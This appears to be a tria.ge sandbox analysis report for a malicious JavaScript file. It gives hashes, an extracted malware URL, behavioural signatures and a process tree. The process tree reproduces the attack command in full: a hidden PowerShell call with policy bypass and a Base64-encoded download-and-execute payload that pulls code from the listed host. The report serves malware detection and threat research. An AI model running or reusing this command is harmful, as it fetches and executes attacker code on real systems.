Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24/12/2023, 14:39
Static task
static1
Behavioral task
behavioral1
Sample
01a6c61bfaf8b588ddcc9bff1f8122f0.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
01a6c61bfaf8b588ddcc9bff1f8122f0.js
Resource
win10v2004-20231215-en
General
-
Target
01a6c61bfaf8b588ddcc9bff1f8122f0.js
-
Size
105KB
-
MD5
01a6c61bfaf8b588ddcc9bff1f8122f0
-
SHA1
7b096f834e5438f1dba36e1f80588120991a5608
-
SHA256
7113ee92ac34133d41abaffdd2545450df151d83030d49117333e8b939419f17
-
SHA512
5e805ad3e0960b22303fb2fa51936c877c6cfb45edc3aa92696af5cf66f951cccad7f1b0dacb20f50bff8ee3674003047a6a231b3c3a8d56c6a4c60bef5fa904
-
SSDEEP
3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXA:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGh
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2428 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2428 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2868 wrote to memory of 2988 2868 wscript.exe 28 PID 2868 wrote to memory of 2988 2868 wscript.exe 28 PID 2868 wrote to memory of 2988 2868 wscript.exe 28 PID 2988 wrote to memory of 2428 2988 cmd.exe 30 PID 2988 wrote to memory of 2428 2988 cmd.exe 30 PID 2988 wrote to memory of 2428 2988 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\01a6c61bfaf8b588ddcc9bff1f8122f0.js1⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-